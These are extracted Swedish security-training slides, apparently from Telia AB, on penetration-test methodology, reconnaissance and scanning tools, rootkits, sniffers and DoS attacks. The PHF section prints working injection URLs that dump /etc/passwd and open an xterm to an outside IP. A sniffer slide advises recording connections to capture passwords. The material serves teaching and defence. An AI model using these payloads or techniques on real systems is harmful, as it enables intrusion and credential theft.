u Fred Cohen (Welcome to the 50 ways series)

Dessa exempel på checklistor är ett urval av alla de som finns. Normaltbrukar man ta hem en som verkar bra (SANS) och uppdatera denna enligt debehov och krav som företaget har. Den anpassas även så att bara deapplikationer som körs finns med på listan.

28

Telia AB

Säkerhetskontroller

u Vulnerability scannersu Ögonblicksbildu Letar efter kända bristeru ”Point-and-click”u Snygga rapporteru Chefs-gränssnitt

En säkerhetskontroll ger en ”ögonblicksbild” av det aktuella systemet ochvisar dess eventuella brister. Precis som ett besiktningsprotokoll för din bil.

Dessa kontroller kan göras återkommande för att se om nya brister uppståttpga konfigurationsförändringar, nya program och funktioner eller bristandesystemadministration. De nya kontrollerna innefattar även kontroll omsystemet står emot de brister som upptäcks sedan förra gången kontrollenutfördes.

29

Telia AB

Informella penetrationstester

• Syftet är att erhålla access till målsystemen.

Inte att kartlägga alla brister

• Kartlägg målsystem och påträffade brister

• Välj enklast möjliga intrångsmetod

snabbast, sexigast

• Dokumentera!

30

Telia AB

Flödesschema för penetrationstester

Informations-insamling

Avgränsning målsystem

Intrång i målsystem

Kartläggningmålsystem

RapporteraDokumentera

Denna metodik är resultatet från flera olika penetrationsuppdrag. Denstämmer väl med den allmänna tron hur hackers/crackers arbetar. ;-) Många”tagna” hackers påstår att de väler ”offer” på måfå.

Grundinställningen är att alla program innehåller brister. Ju större program,desto flera brister. Även säkerhetsprogram/funktioner innehåller brister.

System som är anslutna till nätverk kör ofta flera samtidigt program, vilket isin tur leder till att systemets säkerhet kan ha försvagats. Med utgångspunktfrån detta resonemang går det att formalisera en arbetsmetodik. En attackkan delas in i fem separata steg:

Steg 1: Informationsinsamling

Steg 2: Avgränsningav intressanta målsystem

Steg 3: Kartläggning av målet.

Steg 4: Attack mot målet

a) Attack mot programvara/operativsystem

b) Attack mot kommunikationen

Då man etablerar sig i systemet, dvs man tar kontrollen över systemetgenom att utnyttjar brister i systemet, knäcker lösenordsfiler och installerarRootkit.

Då man lyckats etablera sig i systemet, finns små möjligheter att upptäckaeller att återställa den befintliga installationen. Nyinstallation är oftast endamöjligheten för att återställa ett drabbat system.

Steg 5: Dokumentera och rapportera

31

Telia AB

Informationsinsamling



• Publik information

• WEB, News

• RIPE, IANA

• Kataloger, databaser av olika slag

• Social Engineering

• Papperskorgar

• DNS

I Sverige, tänker inte företagen på industrispionage i konkreta termer, emellertid ärdet i andra länder ett legitimt sätt att skaffa sitt företag nödvändig information.Industrispionage går oftast under den kollektiva termen "Business Intelligence".Det är lagen och moraliska värderingar som bestämmer var gränsen går förinformationsinhämtningen. Nedan följer en gradering på metoder som företag kananvända för att skaffa information om konkurrenter:1 Publicerat material offentliga dokument, typ rättegångsprotokoll.2 Information som konkurrenter själva publicerar.3 Marknadsundersökningar och konsultrapporter.4 Finansiella rapporter, och mäklares prognoser.5 Mässor, utställningar och broschyrer.6 Analys av konkurrenters produkter.7 Rapporter från försäljningsavdelning och inköpsavdelningen8 Legitima anställningsintervjuer med personer som arbetat hos konkurrenter9 Kamouflerade "utpumpningar", av konkurrenter vid tekniska seminarier.10 Direkta observationer under hemliga förhållanden.11 Falska anställningsintervjuer med personer som arbetat hos konkurrenter.(m.a.o.utan någon verklig intention att anställa personen)12 Falska förhandlingar med konkurrenter om t ex samarbete eller licensavtal.13 Anställa professionella utredare att hämta specifik typ av information.14 Rekrytera medarbetare från konkurrent, för att få specifik ”know how”15 Gå in i konkurrentens byggnader, fabriker och egendom utan tillstånd.16 Muta konkurrenters leverantörer eller anställda.17 "Plantera" en agent på konkurrentens lönelista.18 Avlyssning av konkurrenter.19 Stöld av ritningar, prov, dokument och liknande egendom.20 Utpressning och hotelser.De första sju metoderna anses som moraliskt riktiga och lagliga. De resterande

32

Telia AB

inetnum: 131.115.15.0 - 131.115.15.255netname: offerdescr: Offer no671descr: Seized-97country: SEadmin-c: OS212-RIPEtech-c: BA291-RIPEstatus: ASSIGNED PAmnt-by: TELIANET-LIRchanged: [email protected] 980325source: RIPE

Utdrag ur RIPEs databas

En uppslagning i RIPEs databas för att få reda på information om dettilltänkta offret.

Det finns speciella organisationer där man registrerar IP-adresser ochdomännamn. De har webbservrar där man kan samla information omspecifika IP-adresser, nätverk och domäner. Man får oftast namn påkontaktpersoner, tekniker som man kan kontakta vid eventuella fel.

Dessa är uppdelade på fllera sökdatabaser och man har delat upp världenenligt nedan:

•ARIN hanterar Nord-, Mellan- och Sydamerika (URL:http://www.arin.net/arin7arinwhois.html)

•APNIC hanterar Asien och Stilla Havet (URL:http://www.apnic.net/reg.html)

•RIPE hanterar Europa (URL: http://www.ripe.net/db/whois.html)

Det finns även utmärkta hjälpmedel som automatiskt söker efter deneftersökta IP-adressen eller domänen i flera olika databaser. Ett av dessaeminenta verktyg kallas Sam Spade och kör i Windows-miljö. Programmetär gratis. (URL: http://www.samspade.org)

I Unix-miljön kan man använda kommandon som whois, nslookup etc ellerverktyg som liknar Sam Spade.

33

Telia AB

Domain Name Server

u Knyter datornamn till IP-adresser och vice versau Använder port 53 (udp/tcp)u Zone Transfer innebär att hela ”adressboken”

tankas utu Måste säkras upp genom att

u enbart tillåta Zone Transfers till legitima servraru stoppa alla externa förfrågningar på tcp/53 = zone

transfersu extern DNS ska enbart ge svar på system på externt

nät eller DMZ. En inre DNS hanterar det internanätverket

Genom att använda DNS, Domain Name Server, kan man ställa frågor somger uttömmande svar.

Förutom att få reda på vilka datornamn som motsvaras av IP-adresser kanman tanka hem hela IP-uppbyggnaden. Det kallas för Zone Transfers.

% nslookup

Default Server: terminator.movie.edu

Address: 0.0.0.0

> set type=any

> ls movie.edu.

Axfr är ett mycket effektivt verktyg att ”fråga ut” DNS. Det skapar en egenkomprimerad databas innehållande information om den ”Zon” maneftersökte. Axfr kan även användas för att ladda ned information ända fråntopp-domänerna, vilket inte är så smart men visar på styrkan i verktyget.

URL: ftp://ftp.trinux.org/pub/trinux/tools/netmap/axfr-0.5.2.tar.gz)

34

Telia AB

Avgränsning av målsystem




Identifiera vilka målsystem som är:

• intressanta

• ”förbjudna”

• ”känsliga” för störningar

Vid penetrationstest är det mer sällan att man får testa fritt (fria kriget) utanman får ett antal ip-adresser eller nätverk att ”hålla sig till”.

Vissa system är förbjudna att röra då dessa är kritiska för verksamheten.Detsamma gäller känsliga system.

35

Telia AB

Kartläggning av målsystem

• Kartläggning av ”levande” system (Nätskiktet)

• Manuella verktyg såsom Ping, Traceroute m.fl.

• Automatiska verktyg såsom Scan, Nmap, Cheops, m.fl.

• Kartläggning av tjänster (Applikationer)

• Manuella verktyg såsom rpcinfo, showmount, telnet m.fl.

• Automatiska verktyg såsom Satan, ISS, Strobe m.fl.




Fördelen att köra ”manuell” i stället för ”maskinellt” (dvs köra separataavgränsade program istf vulnerability scanners) är att man kan köra ”tyst”.

Ett moment i ett penetrationstest kan vara att se om systemadministratörerm.fl. upptäcker närvaron av PT-gänget. Om så är fallet kan man följa och sehur de agerar, vilka motåtgärder de vidtar och om de rapporterar till avseddchef/instans

36

Telia AB

Ping

u Packet Internet Grouperu Kontrollera att ett system ”lever”u Använder ICMP Echo Requestu Finns ett otal olika varianteru Ping-of-Death

% ping -s ns.uu.net 56 5PING ns.uu.net: 56 data bytes64 bytes from ns.uu.net (137.39.1.3): icmp_seq=0. time=32.8 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=1. time=15.3 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=2. time=13.1 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=3. time=32.4 ms64 bytes from ns.uu.net (137.39.1.3): icmp_seq=4. time=28.1 ms----ns.uu.net PING Statistics----5 packets transmitted, 5 packets received, 0% packet lossround-trip (ms) min/avg/max = 13.1/24.3/32.8

Ping (Packet Internet Grouper) använder ICMP Echo Request för att testa om man når ettsystem. ICMP (Internet Control Message Protocol) är kontroll-paket som används mellansystem/routrar att styra informationsflödet.När destinationen nås av ett Ping svarar denna med ett Echo Reply. Man får tillbaka ettantal rader med svarstider. Om destinationen inte svarade får man meddelandet”Destination unreachable”.Ett Ping sätt med maximal lävslängd på 255 hopp (Time To Live, TTL=255). Om ett pinginte nått destinationen vid det sista hoppet, avslutas sökningen och svaret ”Time exceeded”meddelas.Då destinationen nås sätts även TTL=255 innan svaret Echo Reply sänds tillbaka. Får mandå olika antal hopp mellan ping-begäran och svaret innebär detta att paketen gått olikavägar.Ping kan även användas för överbelastningsattacker genom att man sänder ett för stortping-paket till destinationen (Ping-of-Death).Om man sänder ett/flera Ping till en broadcast-adress och anger en falsk avsändaradress,kommer alla enheter på detta nätsegment att sända ett svar till den avsändaradress manangav. Genom att sända detta till flera broadcast-adresser genererar man så pass myckettrafik till destinationen så att denna kan ”lägga sig på rygg och dö” (Smurf-attack).Det finns många varianter på ping, tex: gping, hping, fping, pinger m.fl.

Ping-Of-DeathNormalt så delas (internet)trafiken upp i mindre bitar. Stora TCP-IP-paket delas upp imindre delar som sätts samman när de når sin slutdestination. Man kan skapa speciella IP-paket som ser ut som delar av större paket. När man samlar ihop alla småpaket bildas ettpaket som är alldeles för stort så kan leda till att nätverkshårdvara och tillämpningarkraschar.Det lättaste sättet att skapa dessa IP-paket är att använda kommandot ping. Dettakommando används för att kontrollera om en dator är tillgänglig, om den svarar på anrop.Det kan jämföras med att man ropar "hallå". Den adresserade datorn svarar "visst, jaglever" till avsändaren.De flesta maskinvaror klarar idag av att hantera för stora IP-paket, s.k. ping-attacker, mendet kan ändå vara värt att filtrera bort dessa för att slippa dessa attacker. Det kan vara värtatt notera att vissa skrivare har en dålig IP-implementation och kan stanna p.g.a. En ping-attack.

37

Telia AB

Traceroute

u Spåra vägen paketen tar till målsystemetu Använder TTL (Time To Live) och en ogiltig portu UDP (normalt) / Linux I-option = (ICMP)u Brandväggar och routers kan konfigureras att ej

svara på ”TTL expired”-paket, både udp/icmp% traceroute ds.internic.nettraceroute to ds.internic.net (198.49.45.10), 30 hops max, 40 byte packets 1 gw-55.nuts.com (172.16.55.200) 0.95 ms 0.91 ms 0.91 ms 2 172.16.230.254 (172.16.230.254) 1.51 ms 1.33 ms 1.29 ms 3 gw225.nuts.com (172.16.2.252) 4.13 ms 1.94 ms 2.20 ms 4 192.221.253.2 (192.221.253.2) 52.90 ms 81.19 ms 58.09 ms 5 washdc1-br2.bbnplanet.net (4.0.36.17) 6.5 ms 5.8 ms 5.88 ms 6 nyc1-br1.bbnplanet.net (4.0.1.114) 13.24 ms 12.71 ms 12.96 ms 7 nyc1-br2.bbnplanet.net (4.0.1.178) 14.64 ms 13.32 ms 12.21 ms 8 cambridge1-br1.bbnplanet.net (4.0.2.86) 28.84 ms 27.78 ms 23.56 ms 9 cambridge1-cr14.bbnplanet.net (199.94.205.14) 19.9 ms 24.7 ms 22.3 ms10 attbcstoll.bbnplanet.net (206.34.99.38) 34.31 ms 36.63 ms 32.21 ms11 ds0.internic.net (198.49.45.10) 33.19 ms 33.34 ms *

Traceroute används för att spåra eller testa en uppkoppling samt hämtainformation om de system de nyttjar. På vägen till målsystem passerarpaketen ett antal routrar som tar hand om paketet och sänder det vidare.Man kan likna dom vid en vägvisare, som kontrollerar adressen och sänderiväg åt rätt håll. Varje steg kallas ett hopp.

Genom att använda traceroute kan man spåra vägen till en destination och fåreda på hur långt bort den är, vilka routrar den passerar samt om det är någraproblem på förbindelsen.

Traceroute skickar ut 3 ICMP-paket till varje router med TTL satt till 1. Denförsta routern minskar TTL med 1, vilket ger TTL=0. Detta innebär attsändningen avslutas och routern skickar en ”Time exceeded” i retur.Traceroute får då reda på routerns namn och IP-adress samt den tid som gåttåt.

Paket 2 skickar nästa 3 paket med TTL=2. Detta innebär att signalenkommer till nästa router på vägen till destinationen. Samma sak händer däroch även denna router sänder tillbaka namn, adress och tidsåtgång.

Därefter skickas nästa 3 paket med TTL=3. Detta förfarande upprepas tilldestinationen nås.

När traceroute inte får något svar rapporteras enbart asterisker (*). Det kanäven innebära att man stött på en brandvägg eller router som antingen inteska svara.

När destinationen är nådd erhåller traceroute returmeddelandet”Unreachable port”, detta eftersom traceroute sänder sina paket på en ogiltigport (33434)

38

Telia AB

Traceroute

39

Telia AB

Ultrascan

linux.log:Port# 7 on host 172.16.100.2 is activePort# 9 on host 172.16.100.2 is activePort# 11 on host 172.16.100.2 is activePort# 13 on host 172.16.100.2 is activePort# 15 on host 172.16.100.2 is activePort# 19 on host 172.16.100.2 is activePort# 21 on host 172.16.100.2 is activePort# 23 on host 172.16.100.2 is activePort# 25 on host 172.16.100.2 is activePort# 37 on host 172.16.100.2 is activePort# 79 on host 172.16.100.2 is activePort# 110 on host 172.16.100.2 is activePort# 111 on host 172.16.100.2 is activePort# 113 on host 172.16.100.2 is activePort# 119 on host 172.16.100.2 is activePort# 139 on host 172.16.100.2 is activePort# 513 on host 172.16.100.2 is activePort# 514 on host 172.16.100.2 is activePort# 515 on host 172.16.100.2 is activePort# 664 on host 172.16.100.2 is active

Windows NT-baseradportscanner

http://www.ntsecurity.net

Ultrascan output

Det finns 2**16-1 = 65 535 olika CP-portar och lika många UDP-portar påett system. Vanliga tjänster/services lyssnar på kända portar, t.ex.

FTP = 21 Telnet = 23 Sendmail = 25 DNS = 53

Webbserver = 80 eller 8080

Dock ska majoriteten vara stängda.

Genom att scanna/genomsöka ett system med ett verktyg som kontrolleraroch rapporterar de portar som är öppna (listening) kan man finna möjligavägar att ta sig in i ett system.

Det finns flera olika scanners, för olika plattformar, och alla har liknandefunktioner. Dock bör man tänka på att de allra flesta är högljudda, dvs synstydligt i loggfiler.

RFC 1700 beskriver de tjänster som har tilldelats en port. När man tagit redapå de portar som är öppna kan man börja leta efter brister i dessa tjänster.Genom att använda dessa brister kan man ta sig in i systemet,

40

Telia AB

Strobe strobe 1.03 (c) 1995 Julian Assange ([email protected]).stats: host = babs trys = 2049 cons = 20 time = 49.94s trys/s = 41.03 trys/ss = 1.93stats: hosts = 2 trys = 2049 cons = 20 time = 49.98s trys/s = 41.00babs echo 7/tcp Echo [95,JBP]babs discard 9/tcp Discard [94,JBP]babs systat 11/tcp Active Users [89,JBP]babs daytime 13/tcp Daytime [93,JBP]babs netstat 15/tcp Netstatbabs chargen 19/tcp ttytst source Character Generatorbabs ftp 21/tcp File Transfer [Control] [96,JBP]babs telnet 23/tcp Telnet [112,JBP]babs smtp 25/tcp Simple Mail Transfer [102,JBP]babs time 37/tcp Time [108,JBP]babs finger 79/tcp Finger [52,KLH]babs pop3 110/tcp Post Office Protocol - Version 3babs sunrpc 111/tcp rpcbind SUN Remote Procedure Callbabs auth 113/tcp Authentication Service [130,MCSJ]babs netbios-ssn 139/tcp NETBIOS Session Service [JBP]babs login 513/tcp remote login a la telnet;babs cmd 514/tcp shell like exec, but automatic#babs shell 514/tcp rlogin style exec (rshd)babs printer 515/tcp spooler (lpd)babs doom 666/tcp doom Id Software#babs mdqs 666/tcp babs nfs 2049/tcp networked file system#babs shilp 2049/tcp

Strobe är en mycket snabb och pålitlig TCP-scanner för Unix-miljö. Denanpassar sig till målmiljön för att få mesta möjliga kräm ur nätverket. Dettagör att Strobe är väldigt effektiv.

Strobe v1.04 ger även information (banners) på öppna portar, om detta finnstillgängligt.

Eftersom Strobe gör connect-scan så syns den tydligt i loggfiler.

URL: ftp://ftp.win.or.jp/pub/network/misc/strobe-1.05.tar.gz

Netcat är ett ytterst kompetent scanner-verktyg som kan användas tillmånga fler sysslor. Den är som en schweizisk armekniv. Netcat i sig kräveren heltimmes presentation. Bland de funktioner som bör nämnas finns:

- portscanning

- ansluta till portar och exekvera kommandon, överföra data etc, etc

- söka efter expoterade filsystem, RPC-tjänster/portar, ftp-tjänster etc, etc,

- återspelningsattacker, installera backdörrar, reläa information (pipe), etcetc

URL: http://www.l0pt.com/users/10pht/nc110.tgz

41

Telia AB

NMAP

Network Mapping by Fyodor

Multiscanner:• Stora nätverk / enstaka system• Specificerade portar• Klarar udp/tcp/icmp• ”Fingerprinting”

Andra features:• Dynamic delay time calc.• Packet timeout och omsändning• Parallell portscanning• Stealth-scanning• TCP sequence# predictability

NMAP är ett verktyg för portscanning av stora nätverk. Fast det fungerarlika bra för enstaka system.

Fungerar på UNIX-plattformar, såsom. Linux, FreeBSD, NetBSD ochOpenBSD. Den fungerar även bra på Solaris, IRIX och BSDI liksomSunOS, HP-UX, AIX, Digital Unix och Cray Unicos. Windowsplattform ärej planerad.

En väldigt flexibel MultiScanner som är snabb, flexibel och klarar olikaprotokoll (UDP, TCP, ICMP m.fl.). Den kan även köras i ”stealth”-modevilket gör att den är svårare att upptäcka.

URL: http://www.insecure.org

Skapad av Fyodor ([email protected])

42

Telia AB

NMAP GUI

Flera olika avsökningar:• Vanilla TCP connect() scanning

• TCP SYN (half open) scanning

• TCP FIN, Xmas, or NULL (stealth) scanning

• TCP ftp proxy scanning (bounce attack)

• SYN/FIN scanning using IP fragments

• TCP ACK and Window scanning

• UDP raw ICMP port unreachable scanning

• ICMP scanning (ping-sweep)

• TCP Ping scanning

• Direct (non portmapper) RPC scanning

• Remote OS Identification by TCP/IP Fingerprinting

• Reverse-ident scanning

NMAP finns beskrivet och refererat till i otaliga artiklar och seminarier.

• Nmap wins Info World's 1998 Best Information Security Product award

•"Cracking Tools Get Smarter" -- Wired March 3 1999

•The CIO Institute Bulletin On Computer Security Vol. 2. No. 3. advancesthe theory that the "coordinated multi-national attacks" on the Pentagonwhich have been on the news lately may really be bored teenagers usingnmap :).

•"Free Windows-based scanners are plentiful, but only Asmodeus showspromise " -- Info World July 6, 1998. This InfoWorld security columnexamines Windows scanners and concludes that users should give up on theWindoze scanners and "take the time to install a Linux box and use nmap."

•" New Generation of Scanning Tools Mask Source of Attack" -- ComputerWorld March 15, 1999.

•"When Good Scanners Go Bad" -- Computer World March 22, 1999.

•"The Art and Detection of Port Scanning" is an introductory article whichfocuses on Nmap and appeard in Sys Admin Magazine in November 1998. Ihaven't found a online link to it. My prior Phrack 51 article entitled "The Artof Port Scanning" gives a more technical overview anyway.

•"Diary of a hack attack" -- Network World, January 10, 2000. Discussesthe activities of a professional security auditor. "Hacker Bob prefersnetwork mapping (nmap) ... it's a port scanner on steroids.

43

Telia AB

System-A System-B NTWS-1 NTWS-3

System-C SunburnIntWeb NameSrv

NTWS-2

Cheops

Kartläggning av nätverkInfoinsamling via SNMP”Fingerprinting”

Har funktioner för:• Trafikflöden• Portscanning• SNMP-frågor

Vid kartläggning kan tysta eller mer eller mindre högljudda verktyganvändas.

Cheops presenterar en snygg grafisk bild av upptäckta system där ävenoperativsystem och version anges. Det går även att få fram informationavseende protokoll, trafikvägar m.m.

Cheops försöker med ”fingerprinting” och ritar ut det antagna OS.

Vidare kan man använda ping, traceroute, snmp-mappning samtportscanning

URL: http://www.marko.net/cheops

44

Telia AB

Spårning

u Syns inte i ”normala” loggfiler

u Använd loggning för inetd

u Installera loggverktyg för TCP/IPu tcpdumpu snortu shadow

45

Telia AB

Spår i loggen (tcpdump)

u En SYN-scan (connect-scan)

Port 21 är öppen på systemet offer.ISP.com:

11:56:20.442740 connect.scanner.net.1141 > offer.ISP.com.21: S 929641:929641(0) win 8192 <mss 536,nop,nop,sackOK> (DF)11:56:21.191786 offer.ISP.com.21 > connect.scanner.net.1141: S 779881634:779881634(0) ack 929642 win 8576 <mss 1460> (DF)11:56:21.201490 connect.scanner.net.1141 > offer.ISP.com.21: . ack 1 win 8576 (DF)

SYN / SYN ACK / ACK följs av en FIN / FIN ACK / FIN / FIN ACK

Port 37 är stängd på systemet offer.ISP.com:

11:56:23.954930 connect.scanner.net.1144 > offer.ISP.com.37: S 932103:932103(0) win 8192 <mss 536,nop,nop,sackOK> (DF)11:56:24.647238 offer.ISP.com.37 > connect.scanner.net.1144: R 0:0(0) ack 1 win 0

SYN / RST ACK

46

Telia AB

Kartläggning av målsystem

• Kartläggning av användare och konton

• Testa ”default” konton för inloggning, filsystem (Win/NT)

• Testa vanliga namn (t.ex utgå från kända e-mail adresser)

• ”Lura” vanliga tjänster såsom Sendmail eller Rexec

• Kartläggning av brister

• Identifiera versionsnummer på web-server, smtp, ftp mm.

• Testa ”exploits”

•Leta efter felkonfigureringar (ofta i NFS, FTP, WEB miljö)

• Felaktiga exporträttigheter (NFS, Win95/NT Shares)

• Felaktiga root-kataloger (Ej chroot)

• Glömmer att stänga av ”standard” inställningar




47

Telia AB

Händelse = Attack

VerktygFysisk attack

Utbyte av info

Kommando

Script / program

Autonom agent

Verktygslåda(toolkit)

Distribueratverktyg

Uttag av info(RöS, avlyssna)

BristKonstruktion

Implementation

Konfiguration

ÅtgärderFråga (probe)

Avsöka (scan)

Dränka (flood)

Autentisera

Kringgå

Lura (spoof)

Läsa

Kopiera

Stjäla

Modifiera

Radera

MålKonto

Process

Data

Komponent

Dator

Nätverk

Inter-network

ResultatÖkadbehörighet

Röjdinformation

Förstördinformation

Tillgänglighetattack (DoS)

Stöld av resurs

HändelseAttack

Källa: A Common Language for Computer Security Incidents, Sandia Report [SAND98-8667] Howard, Longstaff

48

Telia AB

Kartläggning av brister

Givet aktuellt operativsystemoch de startade tjänsternagörs en sökning.

Alternativa webbplatser:• www.rootshell.com• www.securityfocus.com• www.packetstorm.securify.com• www.insecure.org• www.geek-girl.com/bugtraq• www.ntbugtraq.com• www.technotronic.com• www.hackernews.com• c5.hakker.com

De verktyg som används har bl.a. hämtats från Internet. Innan de användssker en säkerhetsgranskning och ev. läggs vissa specialfunktioner in.

49

Telia AB

PHF-brist

• Äldsta bristen• Vanligaste bristen• CGI-program• Utnyttja ett exempelscript

• Exekverade godtyckligakommandon:

•hämta konfigurationsfiler•öppna terminalfönster

Detta visar hur en säkerhetsbrist används som ett av stegen för att ta sig in ien webbserver.

PHF-bristen är en av de äldsta bristerna som finns för webbservrar. Dengällde NCSA HTTPD 1.5 och Apache v1.0.3.

Bristen är ett exempelprogram för CGI (Common Gateway Information)som användes för att prova webbformulär. Då scriptet använder funktionen”escape_shell_cmd()” för att kontrollera indata var den sårbar för en vanligattack där man mixtrade lokalt med funktionen. Själva bristen var attscriptet inte kollade indata tillräckligt noga. Om man bifogade ”newline” (\neller x%0a) kunde man ”hoppa ur” scriptet och lura det att köra godtyckligtkommando efter dessa tecken.

Exempel: För att plocka hem lösenordsfilen skrevs följande sträng:

http://www.offer.net/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Exempel: För att öppna en xterminal till dig själv:

http://www.offer.net/cgi-bin/phf?Qalias=x%0a/usr/openwin/bin/xterm%20-display%20193.12.32.2:0.0%20&

Mer info: http://oliver.efri.hr/~crv/security/bugs/mUNIXes/httpd3.html

50

Telia AB

Buffer overflow

u Absolut vanligaste sättet attskaffa sig åtkomst till ettsystem

u Förväntar sig kort ”input”u Sänder stor ”input”u Förstöra stack/heap

u Program avbrytsu Hackern tar kontroll

u överbelastningsattack (DoS)u rootåtkomst

Kalle fr0jes

Serverprogram:

buffer

Infogad kod

Return addr.

STACK

Stack Frame

Buffer Overflowattack

Modifieraåterhoppsadress

Infoga egen kod

nopnopnop

I utgåva 49 av Phrack publicerade AlephOne artikeln ”Smashing The StackFor Fun And Profit”. Med denna artikel introducerades ”buffer overflow”-attacker. I artikeln visades hur dåligt skrivna program kan användas för attbryta sig in i datorsystem. Detta var i november 1996 och attacken ärfortfarande ”hetpotatis”.Majoriteten av de advisories som utfärdades avCERT under 1999 handlade om ”buffer overflows”.

Denna attack syftar att man ger mer data är förväntat till en buffer/array, såatt man går utanför allokerat minne, t.ex orsaka ett ”segmentation fault”.Vanligtvis kan man förknippa dessa operationer med strcpy(), strcat() ochsprintf().

”Attack”-koden är enkel och kräver ett fåtal bytes ”exec (sh)”. Denna kodfinns oftast resident i offrets/serveprogrammets adressrymd, de finns bl.a. Istandardbibliotek som libc och glibc. Den som attackerar behöver ”bara”hitta ett program med dålig ”bounds checking” och ge input > buffer size.Otaliga varianter finns - kreativiteten sätter gränserna.

Läs mer på http://www.2600.net/phrack/p49-14.html och http://immunix.org

51

Telia AB

Etablera bas

u Installera ett rootkit.u Skaffa en reservväg, t.ex. ett användarkonto

som ser äkta ut.u Aktivera sniffers för att fånga lösenord till andra

system.u Städa undan efter dig.

u Vittja systemen när risken för upptäckt är minst

52

Telia AB

Rootkit

En samling verktyg som används för att:u installera bakdörraru samla data via t.ex. sniffersu städa loggfileru byta ut kritiska systemprogram mot

”modifierade” varianter i syfte attu dölja att systemet har komprometteratsu få flera lösenord och större behörigheter

Ett rootkit ger inte hackern root-åtkomst men kräver att man är root för att kunna nyttja det fullt ut

Att installera ett rootkit är det sista steget på ett ”taget” system. Ett rootkitbestår av flera program som har funktioner som t.ex:

• rensar loggfiler (raderar eller snyggt städar upp i själva filen)

• skapa diskutrymmen på ”slackspace”

• trojanska hästar

• program som döljer din närvaro i systemet

• bakdörrar, eller reservvägar om du blir utslängd ochsystemadministratören täpper till det hål/brist du ursprungligen tog dig in.

Det finns flera olika rootkit med skiftande kvalitet och karaktär.

För att ”städa upp” efter ett intrång där man misstänker att ett rootkitanvänds, måste man installera om systemet från allra första början, dvs frånscratch.

53

Telia AB

Sniffers

u Ethereal, sniffit, linsniff, snoop, websniff, es m.fl.

u nätverksprotokollanalysator

u övervaka och spela in nätverkstrafik i realtid

u granska i efterhand

-- TCP/IP LOG -- TM: Tue Feb 9 22:38:56 -- PATH: local.offer.net(1310) =>system.offer.net(telnet)STAT: Tue Feb 9 22:46:14, 316 pkts, 255 bytes [DATA LIMIT]DATA:user(127)(127)(127)(127)(127)(127)(127)web: werk78: exec tcsh: pwd: ls

Ethereal är ett analysverktyg av nätverksprotokoll, eller en sniffer.

Med detta verktyg (och liknande) kan du fånga och spela in nätverkstrafik irealtid.

Ett bra tips är att spela in alla uppkopplingar för att fånga ip-adress+userid+password

54

Telia AB

HACKERTRENDER

55

Telia AB

Trender: Hackers

u Antalet ökaru Wannabies (”peka och klick”-verktyg)u Organiserad brottslighet (Portugese Bank)u Hacktivism

Utvalda offer:• Privatpersoner (mjuka certifikat, konton/lösenord)

• ”Lovliga” företag (KI, Telia, Shell, HM, Toys’ß ’us)

• Företag (generellt)

56

Telia AB

Trender: Metoder

u Nukes

u Trojaner (Netbus, BO2K, Donald Dick, ..)

u Distribuerade attacker (TFN, Tfnk2K,Stacheldraht, Shaft)

u samt ”Traditionella” metoder som att utnyttjabrister, ex. Bind, sunRPC, Qpop,...

Aktuellt just nu!• DDoS• Bind• Root compromises• CCS (html)

57

Telia AB

Grundbultar

u Förhindra att säkerhetsincidenter inträffaru Stoppa och begränsa inträffad säkerhetsincidentu Återställau Uppföljning

u Ta tag i händelserna!

u Visa inåt och utåt att manu reagerar

u ageraru vidtar motåtgärder

Avskräckande

58

Telia AB

Förberedelser

u Förhindra att säkerhetsincidenter inträffaru Regler och riktlinjer (IT-säkerhetspolicy)u Anvisningar och checklistor

u Säkra systemen och externa kopplingar

u Följa upp loggfileru Ordning och reda (ex. dokumenterat nätverk- och systemmiljö)

u Hålla sig à jouru Säkerhetsbrister, uppdateringar, nyheter

Förberedelse

59

Telia AB

Förbered för incidenter

u Fastställ en accepterad terminologiu Fastställ incidentflöde/strukturu Kvalificera säkerhetsincidenteru Bestäm toleransnivåu Skapa en organisation för att hantera

säkerhetsincidenter:u Syfte Målu Ansvar och roller Verksamhetsområde

u Avgränsningar Rapportering

u Skapa en utvecklings- och handlingsplan

60

Telia AB

Våra hackers and phreakers

61

Telia AB

DoS

”Denial-of-Service”-attacker

Överbelastningsattacker

62

Telia AB

Överbelastningsattacker

Syftet:u ??

Hur:u Sända felaktiga data eller data i fel formatu Sända för mycket data

Resultat:u System stannaru System eller applikationer loopar och tar all processorkraft

Överbelastningsattacker har funnits några år och har det senaste halvåretblivit alltmer kraftfulla. Nya program gör att det är betydligt svårare attupptäcka förövaren.

63

Telia AB

Handskakning

u TCP 3-vägs handskakning

Syn (A, ISNA)

Ack (B, ISNB)

Syn (B, ISNB)Ack (A, ISNA),

Vid en normal uppkoppling sker följande steg.

Inititor sänder SYN-paket med sitt ISN (Initial Sequence Number). Dettaanvänds för att kontrollera att inga paket tappas under sessionen. ISN kanskapas helt slumpmässigt eller på ett mindre säkert sätt (fast).

Mottagaren sänder ett ACK (acknowledgement) till Initiator samt ett egetSYN-paket med stt ISN.

Initiator kontrollerar ACKets ISN och sänder i sin tur ett ACK påmottagarens SYN.

Då paket sänds ökas ISN hela tiden med ett (1) och hoppas ett nummer överkan mottagaren påtala att paket nr X ej togs emot och omsändning kan ske.

64

Telia AB

SYN-flooding

u Sänder SYN till målsystem med falsk avsändaradress

u Målsystem måste svara på alla SYNu Fyller upp målsystemets köer med SYNsu Målsystemet överbelastas och inga ”äkta” anslutningar tillåts

u Målsystem kan ”reda ut situationen” mha Timeout

Syn (X, ISNX)

Syn (X, ISNX)

Syn (X, ISNX)

Ack (X, ISNx),

SYN-attack, eller synkroniseringspaket används av TCP/IP för att skapasessioner. Klienten skickar ett SYN-paket till servern som i sin tur skapar ensession vilket bekräftar att SYN-paketet gått fram.

Servrar av alla slag kan hantera en stor mängd sessioner men det finns enbegränsning. Varje session är igång så länge som en server tycker att denanvänds, därefter stängs den ned. Denna tid bestäms till en Timeout-tid.

Genom att sända en kontinuerlig ström av SYN-paket kan man snabbt göraslut på alla sessioner hos en server.

Mycket av den programvara som finns för servrar klarar att snabbt stänganed sessioner som inte har någon trafik. Om man, då man sänder SYN-paketoch även förfalskar avsändaradressen t.ex. så att det blir samma adress somden aktuella servern genereras ännu mera störande trafik.

Detta kan dock förhindras av anti-spoof"-filter som hittar förfalskadeavsändaradresser. Dessa filter läggs in i bl.a. routrar hos Internetleverantöreroch företag.

65

Telia AB

Syn4K

